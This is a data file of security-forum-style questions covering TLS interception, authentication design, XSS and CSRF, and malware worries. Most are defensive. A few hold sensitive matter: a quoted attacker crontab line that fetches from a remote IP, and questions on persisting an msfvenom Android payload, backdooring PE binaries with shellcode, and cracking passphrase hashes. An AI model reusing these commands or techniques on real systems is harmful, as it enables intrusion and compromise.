instruction
stringlengths
24
29.9k
A few days ago Kazakhstan gov-t passed a law to enforce using gov-t signed SSL certificates on all https traffic on all (almost) ISPs. So when you visit https://google.com your browser will warn that the certificate is untrusted and you must have to trust or install those certificates manually. In short, you use gov-t ...
I noticed some wierd behavior in our firewall logs: a computer in our subnet 192.168.1.0/24 sending UDP packets in port 161 to an IP in subnet 192.168.20.0 (we don't have a subnet like that), and the packets going through the LAN to WAN policy. I have installed Sysmon in the computer that is creating this connection, b...
I setup an internal Root CA with another Intermediate CA, which will issue and sign the certificates for other internal servers. When I did the "openssl s_client -connect :443" it shows the error message that "Self Signed Certificate is in the Certificate of Chain". I believe this could be due to the Root CA is self s...
Keybase co-founder Chris Coyne: "Our goal is end-to-end encryption with minimal friction". How does Keybase do this for Keybase group chats? It relates to this question: Which protocols exist for end-to-end encrypted group chat? I haven't found the answer in the Keybase docs.
A user stores a raw information (a comment on a website, a like on a post etc.) in a database. He pairs it with a hashed password and keep the original password safely for him/herself. This password is required to modify or delete this data. Let's say the password is randomly generated, long enough, the hash algorithm ...
This seems a common use case, but I have not been able to find a satisfactory answer. We have a public REST API, which we want 3rd parties to be able to write their own Progressive Web Applications and call the API. This means we have to disable CORS as the requests will not be coming from the domain that hosts the API...
In its default settings, uMatrix content blocker allows CSS and images (JPG, PNG, etc) from all sources, unless denied by a site-specific block list. It also allows 1st party cookies, scripts, and multimedia. How much can a 3rd party learn about a site visitor through only CSS and images? Assume an up-to-date standards...
(I had to move this from Network Engineering stack exchange where I origianlly asked this question) If a device in monitoring mode snoops on the traffic in a WLAN, can it CAPTURE and READ multicast packets? For instance, if a device broadcasting packets to multicast address 239.255.255.250, can a monitoring device capt...
A few days ago my VPS came under heavy load from spammers trying ssh attacks and script injections. I have since added new fail2ban regexps and new security measures for REDIS where it looks like they were able to enter from. I found this entry in my redis and root users' crontab. */1 * * * * cur -fsSL http://185.181.1...
I was thinking about an authentication where the user only has to know a password but no salt, everything else the client retrieves from the server yet a user's password can't be retrieved from the data on the server nor from the communication, meaning not even the server ever gets the password I thought something li...
Can any application install a kernel driver? if not, then how Windows decides who can and who cannot? If AVs can install kernel drivers, considering they are an application with an installer just like the rest of apps, then what stops malware from installing a kernel driver and bypassing the protection of the AV?
I am learning binary exploitation from "Hacking: The Art of Exploitation". In theory the address of an element of stack should be higher than the address of an element on heap. But in this program I am getting the address of stack_var is lower than that of heap_var. I am using Ubuntu 18.04.2 LTS with AMD Ryzen 5 2500u ...
I have confirmed the presence of reflected XSS vulnerability in my website and I see the csrftoken present in one of the cookies when injecting a document.cookie in javascript. We don't have the user-session cookies. Is that csrftoken sufficient enough for performing further attacks?
There is now MITM on HTTPS traffic in Kazakhstan. But for MITM to work, other than installing the certificate, there has to be someone proxying the request, right? Will that role be played by the ISPs? Say I want to connect to Facebook. Does the proxy spoof Facebook's certificate? How does that work? Accessing Facebook...
I (from EU) recently attended a scientific conference in China. As part of the goodies there is a decent looking thumbdrive which has the conference logo printed on it. It seems to be in original packaging, so I guess somebody ordered them to be made with the logo from the manufacturer directly. I am a bit wary about g...
5 days ago, I downloaded a file from the internet and I'm currently worried about it being malware. I don't store any important information on the computer I downloaded it with, but I'm afraid of the file (if it is indeed malware) spreading to other computers on the network. I don't have shared folders, and every compu...
Does the browser setting to restore the previous session on startup pose any security concerns on a machine with separate logins for each user? Are there any security reasons for an organization to block that setting?
I just installed mitmproxy tool. I want to run it. Once I type: sudo mitmproxy I get this error: Error starting proxy server: OSError(98, 'Address already in use') I searched and found some suggestion for changing the port by typing: sudo mitmproxy -p 99999 However, I think this may cause me problems as I wan to do H...
the npm advisories site lists quite a lot of malicious packages which - in my understanding - are not packages with vulnerabilities but malicious per se. These packages were removed from the npm repo for good reason, but is there a possibility to get hold of these packages without being an AV-Company?
Say the attacker owns a domain, attacker.com. Attacker wants to create a webpage on it to make a CSRF attack toward the victim.com server. The targeted page is victim.com/target.php which only accepts POST request, with a specific Accept header of, say, application/x-foo. With such setup, I couldn't find a way for the ...
on a computer I received an email with a web link inside that shows the following address: hxxps://myprimeedu.com/certificato/f0uq1-17relk-aW5mb2NlcmJvbmVhbGx1bWluaW9AcGVjLml0-y8ym71-wowuq-2rpvmx/MDY0OTE3NzQ2MDIzMDM= (EDIT: Link neutered) From this address (with the Chrome browser) a .zip file is downloaded which cont...
I need to send verification emails for things like email verification password reset email change password change In the past most webapps would send an email with a clickable verification link that I'd click to go back to the site and complete the process. These days I see many webapps instead send an email with a ...
Say that we have an authentication system that generates JWT to authenticate users to other systems. This JWT contains an inner token that can be made by multiple IDP's. The signature of this JWT is always verified before it is used to authenticate. The JWT is only as short-lived as the inner token, but the inner token...
I was wondering recently how to create secure mechanism for sending password while log in to the system. Then i had wicked thought why to send password at all. Let's imagine mechanism where client sends user id who wants to be logged in, server "welcomes with bread and salt" by sending challenge and random salt. Clien...
How can I make a request from one app to another on iOS and verify the origin of the app request? Apple used to have an applicationSource sent along with deeplinks, but it's now being deprecated. Does anyone have any techniques to mitigate against this CSRF?
I need to review a large number of .exe game files. I recently had an incident where I got infected by an .exe that passed all my 'checks': virus scan, Virustotal, reviews, community feedback, uploader history, uploader motive. Lacking any other ideas, sandbox software seems like a viable second defence to those checks...
I was monitoring network connections using Netstat and came across netstat -tlnp. I was wondering what this is, what it does, and how the command works. I have checked the netstat man pages for my distro however, I cannot seem to find the entire syntax. Any help will be appreciated.
It's seeming like the extra loop via the client backend in code flow only adds obscurity - not security. If, in the end, the client backend dishes out the same access token to the front end as the auth server would via implicit flow, what specific attack is mitigated by the extra back channel communication? Having read...
I work at a small company and we use an external company to take care of all our IT needs (a "managed IT service provider"). This includes managing our windows domain, our network, and everything else. To do so, they obviously have domain admin rights over all the computers. Some high-profile employees work with sensi...
We are using key-vault for storing the secrets, will it give any added advantage if we encrypt the values before storing it in key-vault?
I searched for a long time, and never really find any articles or posts that fully explain how a password reset token should be created. What I know so far: It should be random. Its hash should be stored in the database. It should expire after some time. What I'm not too sure about: Should I use a cryptographic meth...
It's clear that the system has to filter user input. I always thought that the standard is also to check user uploaded files for malware/shells. I'm curious if above is really needed. There is a PHP (Laravel) application that is accepting file uploads from the user (via REST API). The file will be stored on the server ...
I recently downloaded subtitles for an episode of a series. I then looked at whether .srt files could contain a virus and found that that was indeed the case with some .srt files which exploited a vulnerability in a media player when loaded. That info I found in an article from a year or 2 ago, so I wondered if this w...
I am developing an online registration form for a discount program whose eligibility can be determined by examining a person's ID. When a user submits the form, he or she is asked to upload a photocopy of the ID will be sent via email to the organization for verification. I have steered the stakeholders away from all...
Assume I have a public API endpoint which I'd like to protect against abuse. I'd like to implement a solution that ensures that the client spends some computational time before allowing the request to succeed. What would be the problem with having the server choose a random hash and a variable cost of say 200,000, wher...
I have an intranet website that requires an SSL Certificate. From what I've seen it seems like this is difficult to accomplish or cumbersome. Would I be able to buy an SSL certificate if there is an external dns which points to the internal IP address. I understand that it won't resolve if the user is not connected to ...
Late last night I received a "password reset" email from info@mailer.netflix.com. It looked legit, but I had not requested a password reset. I checked my account's "recent account access" but saw nothing unusual there. I did not click through and did not reset my password via any other channel. I just left it. Early th...
I am reading design documents of an internal Whats-app like chat application. Developers are planning to use asymmetric encryption to encrypt all messages. Every user will have a public/private key pair and for every new chat a chat-public and a chat-private key will be generated. Keys will be delivered to relevant pa...
Can screen shares be detected/tracked when using Citrix-receiver to remote into office desktop? Can other tools in addition to Citrix be used to monitor employees?
We've been asked to generate certificate signing request using elliptic curve and we can't use any third-party library it's an embedded application with very limited resources). We are used to generate CSR using RSA, but we can't find any documentation on how to do that with Elliptic Curve, specifically how to do the ...
I'm currently working on Snort and I'm trying to detect meterpreter sessions in reverse TCP or HTTPS, a Trojan ... Does anyone know snort rules in order to detect this? Despite my research, I found nothing conclusive.
Reading the new advice on password which seems to spead easily (at least in my workplace), I was wondering how to use hashcat for cracking four-word password hashes? Say I have this hash 1da9133ab9dbd11d2937ec8d312e1e2569857059e73cc72df92e670928983ab5 of a password a user claims to be unbreakable because it's a 16 char...
I am building a web app that needs to be secure. Is there any security advantage to hiding path parameters? I am using Angular (I don't know if this is important). What I mean by hiding path parameters is instead of having a URL that reads https//yourApp/user/<user_id here> to have one that reads https//yourApp/user ...
I'm trying to intercept a mobile traffic of an android app I built using burp suite. I connect the mobile device to burp proxy, and install the CA. But I get a protocol error message, and couldn't see the traffic at the Proxy tab. 1563960835366 Error Proxy [389] The client failed to negotiate an SSL connection to...
Referenced in the recent VLC vulnerability and other places, apparently buffer overreads can cause arbitrary code execution. How does it do that? Suppose in the following toy example void badcpy(const char* src, char* dst, int n) { for(int i = 0; i < n; i++) dst[i] = src[i]; dst[n] = '\0'; } int main(i...
Is there something I can put behind my bus pass in my rfid protected wallet so that it will scan on the busses. At the moment I have to take it out to use it.
I mean why are tools needed for pen-testing? I've hacked websites using plain XSS and SQL injections. I didn't require any tools such as the ones I listed above. Now that I want to progress further and improve my overall flexibility as a pen-tester. I seek an answer to this question. (in pen-testing perspective)
According to Why are self signed certificates not trusted and is there a way to make them trusted?, to trust a self-signed certificate we need to import the root certificate into the trust store of the browser. Does that mean I must distribute to my clients a file, and is that the *.crt file, the *.csr, or the *.key fi...
I have received one of those typical sextortion scams ("drive-by exploit", filmed by webcam (mine has tape on it), pay bitcoin etc.). The thing is that an old password of mine is included (I don't even remember where I used it), but searching the password on HaveIBeenPwned returns nothing (I have previously been notifi...
Would a password with multi factor authentication be more secure than biometrics? I am asking due to the fact that if biometric data gets compromised, there is no way to change it, and in data breaches in the past , millions of sets of fingerprints were compromised. In 2014, HD pictures were used to gain access to a Ge...
On modern user oriented devices, such as Android phones, iPhones, PCs(Windows, MacOS, Linux), if there is a remote buffer overflow 0 day, are they only exploitable with the aid of multiple vulnerabilities? An example of this is the need to bypass ASLR or NX. It seems on modern devices exploiting a buffer overflow has b...
I have a website where people can make purchases. The entire website is served with https. On the first page, I accept user profile data and generate a random ID for my client and store that in my database. I then pass the user ID to my second page where I accept user credit card data. When the user submits their info...
Were working towards implementing a SDLC for a company and as in any complex environment there are differences of opinion for the new process. Some of the developers want to make use of one directory others want to use another. Due to IT resource constraints there can be only one directory that will be exempted from e....
Now, I understand how PGP signatures work and why they can be useful to check if a file has been manipulated but this has always bugged me, if I download a file from a site/server, and read: "always make sure to verify your download!!1!" with a PGP signature from the same site (tails offers a browser extension for no...
I'm working on a challenge that was presented to me without much prior knowledge of Python and the pickle library. I'm unable to post the challenge's code for reasons. In short though I am accessing a web app that allows for user's to upload files of any type and size. The code given to me then creates an object for th...
About a month ago, two folders appeared in my /pictures directory named: Ready To Glare (@ReadytoglareYT) _ Twitter_files and Lawrence's stream mom _ funhaus_files . Inside the folders are .js.download files, html files, .jpg files, and .png files, _api files(whatever that means), etc. I didnt create them and never wi...
TLDR; Are there precedents saying not to obfuscate encrypted data? If I'm using some standard, and a client is using the same standard, the only thing we pass back and forth is the key. This is how standard encryption works. But is there any documentation for or against obfuscating the data further? Thus making it esse...
I created a payload with msfvenom and installed it on Android smartphone, but after a reboot or long time without use, it stops working, because the OS kills the process. Is there any way to associate it with any permanent service? I saw that in newer versions of Android this is only possible with a notification bar, ...
I am a beginner in information security. I was clueless about the term "packed file". Can anyone explain to me what a "packed file" is in term of malware analysis?
While reading a number of definitions of attribute-based access control (ABAC), I found that there are two different definitions: Access control decisions are made using the attributes of users, objects and the environment. Access control decisions are made using the attributes of users and objects (although environm...
During scanning my https website via owasp zap , I found that username and password information is not encrypted. What could be the reason and how to fix. Please see below screenshot of ZAP.
Recently we had a security problem. One email account which is based on MS Exchange 365 was hacked and the hacker forwarded all emails per rule to a Gmail account. I checked all relevant PCs and I didn't find any viruses. And I changed the passwords. But in this case changing the passwords didn't change anything becaus...
Given the fact that I have a WAF already deployed, what is the benefit I could get by purchasing a SAST tool that would scan the engineers' code for security flaws? Does this also apply for SCA tools where they can alert in case of using a vulnerable/malicious dependency or library? Can WAFs also protect from that?
Using OWSAP ZAP 2.8.0 On Ubuntu 19.04 With openjdk version 11.0.3 installed When clicking the "Launch Browser" button on ZAP to launch the HUD enabled browser for ZAP, no browser is launched and an error is printed in the terminal (full output below). I have already tried Chromium and Firefox - both have the same is...
When I read the RSA asymmetric encryption: In the environment: Rules are: blue boy, red girl, and black men. blue boy and red girl all have their own public key (blue) and private key (red). In the first step: blue boy signs the plaintext(1), sends the plaintext(1), RSA.sign(1) and blue public key to red girl; th...
I work on a payments system. So DUKPT keys are a must-have requirement. In most cases PIN and Card data are encrypted using DUKPT keys. However, every time we have checked with AWS, we have found that none of the HSMs available on their cloud are DUKPT capable. That is obviously a non-starter for us. Can some expe...
Looking at RFC2616, is it acceptable to return an HTTP 200 (page load) as a response to a SAMLResponse post to the SP? i.e. the user-agent loads a page instead of redirecting via a 302 / 303? Looking for clarity on 3.4.5 here https://www.oasis-open.org/committees/download.php/35387/sstc-saml-bindings-errata-2.0-wd-05-d...
I was reading about Protonmail's system and I couldn't find an anwser to something. In PGP communication is encrypted using assymetric cryptography: public and private keys. If you want to send something securely to a recipient you use they public key of the recipient. To my understanding: in nowadays internet systems ...
There's lots of talk about the HaveIBeenPwned password checker which can securely tell users if their password appears in one of their known data dumps of passwords. This tool has a publically available API behind it which websites/apps/etc are free to use to allow their users to check their passwords, but from what I ...
Through some odd Google rabbit hole, I ended up at what appeared to be the GitHub website. I reflexively tried logging in to view my repositories. Upon attempting to log in, it said my browser did something "odd", and the login failed. I checked the browser URL and it had instead, at the top https://hzb.world/. Fearing...
I would like to ask if I can trust unknown manufacturer detected by windows system configuration. As you can see in the screenshot, all of the other services is known manufacturer but there is one service that using asus name but their manufacturer is unknown. And after that how do I analysis it to check if it is reall...
I'm aware that filtering strings doesn't go this way, but when encoding xss payloads into json format in php and storing that information temporary in classes, the result in the browser, it will show all the strings that are before the javascript content, the payload in the middle won't execute since i use json_encode...
I've have seen the term around and I mostly get that it is referred to when someone reports a vulnerability to Mitre. But what does this mean practically? Are you listed somewhere as the reporter? Is this something people use on their CVs?
During analysing a software testing paper I read We plan to add floating-point operations in order to extend fuzz testing capability. What kind of benefits I can expect from adding floating point operations to fuzzing techniques? What are the advantages of floating point operations for software testing?
I have an openredirect vulnerability on my web application. You can learn about this with the following link: https://stackoverflow.com/questions/48340714/azure-ad-b2c-vulnerable-to-open-redirect Because it is a problem with a Microsoft product, it is not possible to fix this. So I'm wondering if it is possible with II...
I'm using Zenmap to discover some hosts. I save the scan as an nmap xml file. Then I import the xml file into excel to view the data. There are thousands of rows of output in the Zenmap console, but only one row in the xml file. I viewed the xml file in xml notepad and I can see everything. So this may be more of an ex...
I am wondering if anyone know's of a DAST Scanner than can either take in an authenticated request from somewhere like burp, OR some DAST software that takes username and password and then run DAST scans against the target. I've used a ton of DAST tools like nessus, openvas, etc but they all take in a target UNAUTHENT...
My number is being regularly spoofed by someone. Today, I got 100 + calls from people claiming I called them. I answered some of the calls they are all locals from my province. I asked my provider telus(Canada), they said there was no outgoing calls today from my account. So its not because my phone was hacked. How is ...
They way I understand HaveIBeenPawned password API is that it's a safe system because the site "can't do much with my partial hash even if they wanted to". But is that really true? Is the following scenario feasible? My password is thisisnotsecureanymore It's SHA1 is 37cbd1e930b737e4bcbd149c2fcaccbe066ce9c4 I s...
I understand the principle of HSTS, and the fact that the choice of max-age limits how long a visitor could potentially be locked out if the site somehow lost its certificate and had to go back to HTTP-only for a while. When setting up HSTS, most sources recommend rather long max-age values -- on the order of 180 to 36...
When I open the FM Radio app on my new Android Moto X4, it asks me for permission to use the microphone. I realize that apps often require permissions for use in ways that one might not expect, and I would have assumed it was for voice control or such, but the explanation the app provided sounds unlikely and suspicious...
Within minutes of my credit card being stolen by pickpockets, two large transactions were made by the thieves, apparently in a bar or cafe. My bank tells me that they were chip and pin transactions. I am sure to a high degree of certainty that my pin was not compromised: It was not written down It was not used for ot...
I'm practicing backdooring PE binary compiled with ASLR in a WOW64 environment. The approach is pretty straightforward and basically is something like this: Find code cave and a hijacking point. In this case, I choose not to patch the entry point but the shellcode will be trigged on user interaction. After the hijacki...
How can I securely delete/shred a file after I accidentally deleted the file insecurely? Let's say I have Debian Linux installed on a laptop with a 1000T spinning hard disk (so putting aside wear leveling uncertainty and sfill). I stored some super-sensitive data to secret.txt. For some reason, I decided I wanted to de...
I'm using the Haskell Codec.Crypto.SimpleAES package to create a crude password manager. The password manager seems secure but it's unable to warn the user when the decryption key is invalid. If a user supplies a bad decryption key, the program just sends back garbage instead of an "Invalid Decryption Key" error. I w...
Use of JWS may suffer from flaws when relying on the "alg" attribute as described here: Critical vulnerabilities in JSON Web Token libraries. The advice is to verify that the signing JWS algorithm is in a list of accepted algorithms. Practically, most JWS libraries have added am "alg" whitelist parameter: verify(string...
If I had a possibily infected computer, where I had some images and documents that I wanted do backup to a thumb drive, is it possible that that the used thumb drive could be infected and when connected to other computer, infect that computer in the process?
7363000270373f65f945e5184dcb42793cbe2cddb34248ef172b7ddb5e27467fd8d76314ea8bdeb19226687ac0ca01e646dbe8fdb4dfb2d6816f54b9b500639ac6c3bf056fbd4c45a246bbe66e6fd0ce3730801716b12fff942207933e1bb6386806d476ade6f5b1 I can not able to identify which format the string is?
If I generate refresh tokens with expire time of 14 days, do I have to store them in my database and compare them when an access token is renewed, or verifying them (with jwt library) is enough? Also, does it make sense to generate new refresh tokens for the users when they attempt to obtain a new access token?
I'm using BurpSuite to intercept the HTTP/HTTPS requests sent when logging in on https://www.nike.com/. I'm trying to achieve this with the following step: Opening BurpSuite and Firefox Turning on the proxy intercept Turning on FoxyProxy on Firefox Opening the website and trying to logging These steps usually work ...
I am trying to build an app that deals with finance, specifically crypto-currency. What are the fundamentals (preferably in point form, but I'd appreciate explanations too) of securing such an app from attackers? I am new to security and apps and I just need pointers to know what I should research on to achieve the be...
The following image shows a PIN entry device which shuffles the digits. . via twitter I've seen this question, but it doesn't cover why companies are still doing this. I looked at the POS PIN Entry Device and the Software-based PIN Entry on COTSSecurityRequirements requirements and neither of them seems to have anythin...
What exactly is the diffrence between meterpreter reverse_shell and any other non-meterpreter reverse shells? 1) The non-meterpreter reverse shell: windows/shell/reverse_tcp 2) Meterpreter: windows/meterpreter/reverse_tcp
For example if my friend develops a webapp with a custom cert and I add them as CA to my browser, can they do any damage? I mean for example somehow faking certs and stealing my banking password, etc.? Are there such risks with custom cert authorities?
I need to redirect the user's request in such a way when a user enters: https://a.com the mitmproxy redirect it to: https://www.newsite.com/?somepage From a previous post, I found this script in the 3rd answer: import mitmproxy from mitmproxy import http def request(context, flow): if flow.request.url == 'https://...
I'm selling a 4-year-old Dell PC with Windows 10 and two SSDs and I want to be sure that nobody can recover anything from my personal deleted files. So far I've done the following. Completely Bitlocker encrypt both disks, including unused space. (Note the machine did not have TPM so I had to use a password) Uninsta...
Back in the day, retail software was shipped on physical CDs that often had a printed "CD key" label affixed. The (usually alphanumeric) key on the label was unique to that particular copy of the product, and it needed to be entered during setup for the software to work. The keys had a special property that allowed the...
I've read a few articles that describe the heuristic detection used by AVs as being either "weight-based" or "rule-based". The weight-based aspect seems to make sense, but I don't understand what "rule-based" detection is or how it works. This article describes rule-based detection as follows: Nearly all nowadays util...
I have a credit card saved to my primary Paypal account. To make a long story short, I needed to make another Paypal account that would not be connected to my original one. I used a different computer, which had never been logged in to my original one. When I tried to register my credit card to the account, Paypal told...
I'm modifying an ASPNET MVC 5 web site and a requirement is to allow users to upload an XML and PDF file. The XML file will be used to layout text on the PDF based on variables coming from within the system. I have a schema for the XML that can be uploaded - so I can validate against a malformed XML - and that the XML...